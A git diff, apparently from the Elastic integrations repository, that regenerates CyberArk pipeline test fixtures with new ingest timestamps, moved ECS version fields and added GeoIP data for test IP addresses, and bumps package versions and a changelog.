"event": { - "ingested": "2021-06-09T10:19:22.411141900Z" + "ingested": "2021-12-14T14:41:55.823582792Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-03-17 17:35:40.532538723 +0000 UTC oreeu3666.invalid %CYBERARK: MessageID=\"48\";tis 1.6724\",ProductAccount=\"eprehe\",ProductProcess=\"tinvolup\",EventId=\"iaeconse\",EventClass=\"uisa\",EventSeverity=\"medium\",EventMessage=\"allow\",ActingUserName=\"tdolo\",ActingAddress=\"10.204.214.98\",ActionSourceUser=\"iumt\",ActionTargetUser=\"porissus\",ActionObject=\"imip\",ActionSafe=\"tsunt\",ActionLocation=\"rnat\",ActionCategory=\"oremi\",ActionRequestId=\"ectobeat\",ActionReason=\"ecte\",ActionExtraDetails=\"abo\"", "event": { - "ingested": "2021-06-09T10:19:22.411146Z" + "ingested": "2021-12-14T14:41:55.823583384Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"219\";snos 1.5910\",ProductAccount=\"moenimip\",ProductProcess=\"uames\",EventId=\"tium\",EventClass=\"ianonn\",EventSeverity=\"very-high\",EventMessage=\"accept\",ActingUserName=\"etc\",ActingAddress=\"10.223.178.192\",ActionSourceUser=\"atquovol\",ActionTargetUser=\"evel\",ActionObject=\"edol\",ActionSafe=\"sequuntu\",ActionLocation=\"quameius\",ActionCategory=\"litse\",ActionRequestId=\"san\",ActionReason=\"apari\",ActionExtraDetails=\"iarchit\"", "event": { - "ingested": "2021-06-09T10:19:22.411150300Z" + "ingested": "2021-12-14T14:41:55.823583771Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-04-15 07:40:49.052538723 +0000 UTC nsequat6724.www.invalid %CYBERARK: 
MessageID=\"183\";Version=1.801;Message=cancel;Issuer=ati;Station=10.26.137.126;File=dolor;Safe=Mal;Location=ametcons;Category=tconse;RequestId=eumf;Reason=roquisq;Severity=medium;SourceUser=doconse;TargetUser=audant;GatewayStation=10.26.33.181;TicketID=remeum;PolicyID=mmod;UserName=taevit;LogonDomain=ama6820.mail.example;Address=umto3015.mail.lan;CPMStatus=sitv;Port=4667;Database=com;DeviceType=rep;ExtraDetails=mveni;", "event": { - "ingested": "2021-06-09T10:19:22.411154700Z" + "ingested": "2021-12-14T14:41:55.823584169Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 num %CYBERARK: MessageID=\"41\";Version=1.10;Message=accept;Issuer=quaerat;Station=10.148.195.208;File=amnih;Safe=tper;Location=pisciv;Category=tconsect;RequestId=pariat;Reason=iutal;Severity=low;SourceUser=ctobeat;TargetUser=isi;GatewayStation=10.142.161.116;TicketID=eca;PolicyID=ctionofd;UserName=mpori;LogonDomain=olupt966.www5.corp;Address=etquasia1800.www.host;CPMStatus=nimip;Port=7612;Database=squamest;DeviceType=quisn;ExtraDetails=pteu;", "event": { - "ingested": "2021-06-09T10:19:22.411158800Z" + "ingested": "2021-12-14T14:41:55.823584618Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "velillum 2019-05-13 21:45:57.572538723 +0000 UTC ntNequ7639.internal.localdomain %CYBERARK: MessageID=\"270\";Version=1.1026;Message=block;Issuer=itinvo;Station=10.107.24.54;File=emipsumq;Safe=culpaq;Location=quamq;Category=usan;RequestId=tdolo;Reason=ident;Severity=medium;SourceUser=itaedi;TargetUser=hend;GatewayStation=10.10.174.253;TicketID=esciun;PolicyID=tasnul;UserName=uptasn;LogonDomain=lit4112.www.localhost;Address=quisquam2153.mail.host;CPMStatus=dit;Port=2717;Database=lup;DeviceType=aeca;ExtraDetails=isau;", "event": { - "ingested": "2021-06-09T10:19:22.411164Z" + "ingested": "2021-12-14T14:41:55.823585038Z" + 
}, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 28 04:48:31 boreetd %CYBERARK: MessageID=\"309\";tNe 1.2566\",ProductAccount=\"eeufug\",ProductProcess=\"ntin\",EventId=\"iades\",EventClass=\"radipis\",EventSeverity=\"very-high\",EventMessage=\"deny\",ActingUserName=\"luptate\",ActingAddress=\"10.87.92.17\",ActionSourceUser=\"utlabore\",ActionTargetUser=\"tamr\",ActionObject=\"serr\",ActionSafe=\"usci\",ActionLocation=\"unturmag\",ActionCategory=\"dexeaco\",ActionRequestId=\"lupta\",ActionReason=\"ura\",ActionExtraDetails=\"oreeufug\"", "event": { - "ingested": "2021-06-09T10:19:22.411169Z" + "ingested": "2021-12-14T14:41:55.823585427Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 11 11:51:06 dolo %CYBERARK: MessageID=\"295\";Version=1.5649;Message=deny;Issuer=Finibus;Station=10.161.51.135;File=porin;Safe=metMal;Location=ciati;Category=ecillum;RequestId=olor;Reason=amei;Severity=medium;SourceUser=quid;TargetUser=accus;GatewayStation=10.231.51.136;TicketID=ctobeat;PolicyID=upta;UserName=asper;LogonDomain=dictasun3408.internal.invalid;Address=secte1774.localhost;CPMStatus=iqui;Port=5200;Database=litani;DeviceType=emp;ExtraDetails=arch;", "event": { - "ingested": "2021-06-09T10:19:22.411174Z" + "ingested": "2021-12-14T14:41:55.823585814Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 dipisciv %CYBERARK: MessageID=\"148\";uam 
1.2575\",ProductAccount=\"llum\",ProductProcess=\"mwr\",EventId=\"cia\",EventClass=\"idolo\",EventSeverity=\"low\",EventMessage=\"allow\",ActingUserName=\"mquido\",ActingAddress=\"10.51.17.32\",ActionSourceUser=\"ree\",ActionTargetUser=\"itten\",ActionObject=\"quipexea\",ActionSafe=\"orsitv\",ActionLocation=\"dunt\",ActionCategory=\"int\",ActionRequestId=\"ionevo\",ActionReason=\"llitani\",ActionExtraDetails=\"uscipit\"", "event": { - "ingested": "2021-06-09T10:19:22.411184500Z" + "ingested": "2021-12-14T14:41:55.823586263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "etco 2019-07-10 01:56:14.612538723 +0000 UTC iuntN4077.www.invalid %CYBERARK: MessageID=\"260\";isnostru 1.270\",ProductAccount=\"mmodicon\",ProductProcess=\"eetdo\",EventId=\"mquisno\",EventClass=\"atvolup\",EventSeverity=\"medium\",EventMessage=\"deny\",ActingUserName=\"ollita\",ActingAddress=\"10.108.123.148\",ActionSourceUser=\"cto\",ActionTargetUser=\"cusa\",ActionObject=\"nderi\",ActionSafe=\"tem\",ActionLocation=\"tcu\",ActionCategory=\"eumiu\",ActionRequestId=\"nim\",ActionReason=\"pteurs\",ActionExtraDetails=\"ercitati\"", "event": { - "ingested": "2021-06-09T10:19:22.411189700Z" + "ingested": "2021-12-14T14:41:55.823586648Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 24 08:58:48 eturadip %CYBERARK: MessageID=\"8\";Version=1.425;Message=accept;Issuer=rsitamet;Station=10.114.0.148;File=utod;Safe=olesti;Location=edquia;Category=ihi;RequestId=undeomn;Reason=ape;Severity=medium;SourceUser=amco;TargetUser=ons;GatewayStation=10.198.187.144;TicketID=atquo;PolicyID=borio;UserName=equatD;LogonDomain=uidol6868.mail.localdomain;Address=uido2773.www5.test;CPMStatus=acons;Port=3820;Database=periam;DeviceType=ain;ExtraDetails=umiurer;", "event": { - "ingested": "2021-06-09T10:19:22.411194300Z" + "ingested": 
"2021-12-14T14:41:55.823587039Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "onorume 2019-08-07 16:01:23.132538723 +0000 UTC abill5290.lan %CYBERARK: MessageID=\"89\";mini 1.7224\",ProductAccount=\"loru\",ProductProcess=\"iadeser\",EventId=\"litess\",EventClass=\"qui\",EventSeverity=\"low\",EventMessage=\"allow\",ActingUserName=\"equa\",ActingAddress=\"10.61.140.120\",ActionSourceUser=\"olorsit\",ActionTargetUser=\"naaliq\",ActionObject=\"plica\",ActionSafe=\"asiarc\",ActionLocation=\"lor\",ActionCategory=\"nvolupt\",ActionRequestId=\"dquia\",ActionReason=\"ora\",ActionExtraDetails=\"umfugiat\"", "event": { - "ingested": "2021-06-09T10:19:22.411198600Z" + "ingested": "2021-12-14T14:41:55.823587426Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"36\";Version=1.6988;Message=deny;Issuer=ite;Station=10.93.24.151;File=Duis;Safe=lupt;Location=quatur;Category=dminim;RequestId=ptatevel;Reason=aperiame;Severity=very-high;SourceUser=eirured;TargetUser=sequamn;GatewayStation=10.149.238.108;TicketID=ciatisun;PolicyID=duntutl;UserName=nven;LogonDomain=ptat4878.lan;Address=quame1852.www.test;CPMStatus=deomni;Port=4512;Database=fugi;DeviceType=nse;ExtraDetails=nesciu;", "event": { - "ingested": "2021-06-09T10:19:22.411202900Z" + "ingested": "2021-12-14T14:41:55.823587917Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 5 06:06:31 inrepreh %CYBERARK: MessageID=\"39\";rit 
1.6107\",ProductAccount=\"cipitla\",ProductProcess=\"tlab\",EventId=\"vel\",EventClass=\"ionevo\",EventSeverity=\"high\",EventMessage=\"accept\",ActingUserName=\"uinesc\",ActingAddress=\"10.101.45.225\",ActionSourceUser=\"utla\",ActionTargetUser=\"emi\",ActionObject=\"uaerat\",ActionSafe=\"iduntu\",ActionLocation=\"samvol\",ActionCategory=\"equa\",ActionRequestId=\"apari\",ActionReason=\"tsunt\",ActionExtraDetails=\"caecat\"", "event": { - "ingested": "2021-06-09T10:19:22.411207100Z" + "ingested": "2021-12-14T14:41:55.823588612Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "qui 2019-09-19 13:09:05.912538723 +0000 UTC caboN3124.mail.home %CYBERARK: MessageID=\"8\";catcupid 1.3167\",ProductAccount=\"quela\",ProductProcess=\"uamquaer\",EventId=\"texplica\",EventClass=\"enimi\",EventSeverity=\"low\",EventMessage=\"cancel\",ActingUserName=\"ore\",ActingAddress=\"10.2.204.161\",ActionSourceUser=\"iquamqu\",ActionTargetUser=\"eumfugia\",ActionObject=\"reeufugi\",ActionSafe=\"sequines\",ActionLocation=\"minimve\",ActionCategory=\"texplica\",ActionRequestId=\"entorev\",ActionReason=\"quuntur\",ActionExtraDetails=\"olup\"", "event": { - "ingested": "2021-06-09T10:19:22.411211400Z" + "ingested": "2021-12-14T14:41:55.823589045Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "les 2019-10-03 20:11:40.172538723 +0000 UTC norumet2571.internal.example %CYBERARK: MessageID=\"89\";temp 
1.6971\",ProductAccount=\"aliqu\",ProductProcess=\"sequine\",EventId=\"utaliqui\",EventClass=\"isciv\",EventSeverity=\"very-high\",EventMessage=\"cancel\",ActingUserName=\"ptatemse\",ActingAddress=\"10.33.112.100\",ActionSourceUser=\"catcup\",ActionTargetUser=\"enimad\",ActionObject=\"magnaali\",ActionSafe=\"velillum\",ActionLocation=\"ionev\",ActionCategory=\"vitaedi\",ActionRequestId=\"rna\",ActionReason=\"cons\",ActionExtraDetails=\"Except\"", "event": { - "ingested": "2021-06-09T10:19:22.411215600Z" + "ingested": "2021-12-14T14:41:55.823589531Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"95\";Version=1.3175;Message=block;Issuer=neavol;Station=10.94.152.238;File=rporiss;Safe=billoinv;Location=etconse;Category=nesciu;RequestId=mali;Reason=roinBCSe;Severity=very-high;SourceUser=uames;TargetUser=tla;GatewayStation=10.151.110.250;TicketID=psa;PolicyID=nreprehe;UserName=pidatatn;LogonDomain=isno4595.local;Address=lla5407.lan;CPMStatus=upt;Port=4762;Database=itaedict;DeviceType=eroi;ExtraDetails=onemull;", "event": { - "ingested": "2021-06-09T10:19:22.411220Z" + "ingested": "2021-12-14T14:41:55.823589972Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "mporain 2019-11-01 10:16:48.692538723 +0000 UTC eratvo7756.localdomain %CYBERARK: MessageID=\"179\";Version=1.4965;Message=allow;Issuer=alorumwr;Station=10.146.61.5;File=tvolu;Safe=imve;Location=ollitan;Category=temseq;RequestId=vol;Reason=loremips;Severity=high;SourceUser=eturadi;TargetUser=umS;GatewayStation=10.77.9.17;TicketID=henderi;PolicyID=taevitae;UserName=tevel;LogonDomain=tatemse5403.home;Address=iquipexe4708.api.localhost;CPMStatus=quuntur;Port=5473;Database=amremap;DeviceType=oremagna;ExtraDetails=aqu;", "event": { - "ingested": "2021-06-09T10:19:22.411224500Z" + "ingested": "2021-12-14T14:41:55.823590502Z" + 
}, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"83\";tvolu 1.2244\",ProductAccount=\"ore\",ProductProcess=\"lors\",EventId=\"saute\",EventClass=\"ecillumd\",EventSeverity=\"high\",EventMessage=\"allow\",ActingUserName=\"sequatu\",ActingAddress=\"10.128.102.130\",ActionSourceUser=\"mdoloree\",ActionTargetUser=\"que\",ActionObject=\"inBCSed\",ActionSafe=\"cteturad\",ActionLocation=\"umq\",ActionCategory=\"ita\",ActionRequestId=\"ipsaquae\",ActionReason=\"olu\",ActionExtraDetails=\"exerci\"", "event": { - "ingested": "2021-06-09T10:19:22.411228600Z" + "ingested": "2021-12-14T14:41:55.823591064Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019-11-30 00:21:57.212538723 +0000 UTC moen6809.internal.example %CYBERARK: MessageID=\"150\";Version=1.7701;Message=cancel;Issuer=reseo;Station=10.31.86.83;File=pariat;Safe=icaboNe;Location=boreetd;Category=uir;RequestId=rumex;Reason=ectobea;Severity=medium;SourceUser=tamrem;TargetUser=doloremi;GatewayStation=10.200.162.248;TicketID=uptate;PolicyID=giatquo;UserName=onnu;LogonDomain=reprehe650.www.corp;Address=oremip4070.www5.invalid;CPMStatus=turad;Port=1704;Database=billo;DeviceType=doloremi;ExtraDetails=ectetura;", "event": { - "ingested": "2021-06-09T10:19:22.411232800Z" + "ingested": "2021-12-14T14:41:55.823591678Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%CYBERARK: MessageID=\"166\";cul 
1.3325\",ProductAccount=\"atatn\",ProductProcess=\"ipisc\",EventId=\"iatnulap\",EventClass=\"roi\",EventSeverity=\"high\",EventMessage=\"allow\",ActingUserName=\"volup\",ActingAddress=\"10.103.215.159\",ActionSourceUser=\"ddoeiusm\",ActionTargetUser=\"apa\",ActionObject=\"archite\",ActionSafe=\"tur\",ActionLocation=\"ddo\",ActionCategory=\"emp\",ActionRequestId=\"inBC\",ActionReason=\"did\",ActionExtraDetails=\"atcupi\"", "event": { - "ingested": "2021-06-09T10:19:22.411237300Z" + "ingested": "2021-12-14T14:41:55.823592243Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event"
diff --git a/packages/cyberark/manifest.yml b/packages/cyberark/manifest.yml
index e204f0cd055..d3366e933c2 100644
--- a/packages/cyberark/manifest.yml
+++ b/packages/cyberark/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cyberark
 title: CyberArk
-version: 0.4.4
+version: 0.4.5
 description: Deprecated. Use CyberArk Privileged Access Security instead.
 categories: ["security"]
 release: experimental
diff --git a/packages/cyberarkpas/changelog.yml b/packages/cyberarkpas/changelog.yml
index 5a3e270afb0..1bd62b46572 100644
--- a/packages/cyberarkpas/changelog.yml
+++ b/packages/cyberarkpas/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "2.2.2"
+ changes:
+ - description: Regenerate test files using the new GeoIP database
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2339
 - version: "2.2.1"
 changes:
 - description: Change test public IPs to the supported subset
diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json
index fac8bcfa4dd..1251592ebde 100644
--- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json
+++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-105-add-file-category.log-expected.json @@ -63,7 +63,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022887100Z", + "ingested": "2021-12-14T14:41:59.088381649Z", "original": "\u003c5\u003e1 2021-03-08T18:24:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:49\",\"IsoTimestamp\":\"2021-03-08T18:24:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"Address\",\"RequestId\":\"\",\"Reason\":\"Value=[Address]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "105", "kind": "event" @@ -76,6 +76,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -122,7 +131,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022896800Z", + "ingested": "2021-12-14T14:41:59.088384244Z", "original": "\u003c5\u003e1 2021-03-10T09:11:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:54\",\"IsoTimestamp\":\"2021-03-10T09:11:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_localhost.localdomain.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" @@ -135,6 +144,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -181,7 +199,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022905400Z", + "ingested": "2021-12-14T14:41:59.088384691Z", "original": "\u003c5\u003e1 2021-03-10T18:46:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:48\",\"IsoTimestamp\":\"2021-03-10T18:46:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSMServer.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" @@ -194,6 +212,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -241,7 +268,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022911900Z", + "ingested": "2021-12-14T14:41:59.088385080Z", "original": "\u003c5\u003e1 2021-03-10T22:17:26Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:26\",\"IsoTimestamp\":\"2021-03-10T22:17:26Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"LogonDomain\",\"RequestId\":\"\",\"Reason\":\"Value=[ASR-CYBERARK-WI]\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" @@ -254,6 +281,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, 
@@ -300,7 +336,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022918200Z", + "ingested": "2021-12-14T14:41:59.088385539Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMLiveSessions\",\"File\":\"Root\\\\PSM-ASR-CYBERARK-WI.LiveSessions\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" @@ -313,6 +349,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -360,7 +405,7 @@ "event": { "severity": 2, "action": "add file category", - "ingested": "2021-12-09T13:36:36.022924500Z", + "ingested": "2021-12-14T14:41:59.088385938Z", "original": "\u003c5\u003e1 2021-03-11T16:59:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e105\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd File Category\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd File Category\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_VAGRANT.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e_PSMLiveSessions_1\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd File Category\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:58\",\"IsoTimestamp\":\"2021-03-11T16:59:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"105\",\"Desc\":\"Add File 
Category\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_VAGRANT.LiveSessions\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"_PSMLiveSessions_1\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add File Category\",\"GatewayStation\":\"\"}}}", "code": "105", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json index ed15633b613..af26c98f45c 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-106-update-file-category.log-expected.json @@ -63,7 +63,7 @@ "event": { "severity": 2, "action": "update file category", - "ingested": "2021-12-09T13:36:36.540129800Z", + "ingested": "2021-12-14T14:41:59.810329341Z", "original": "\u003c5\u003e1 2021-03-08T18:25:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:25:52\",\"IsoTimestamp\":\"2021-03-08T18:25:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"106\",\"Desc\":\"Update File Category\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Update File Category\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Test\",\"File\":\"Root\\\\Operating System-WinDesktopLocal-Address-adriansr\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"Address\",\"RequestId\":\"\",\"Reason\":\"Value=[components] Old Value=[Address]\",\"ExtraDetails\":\"\",\"Message\":\"Update File Category\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "106", "kind": "event" 
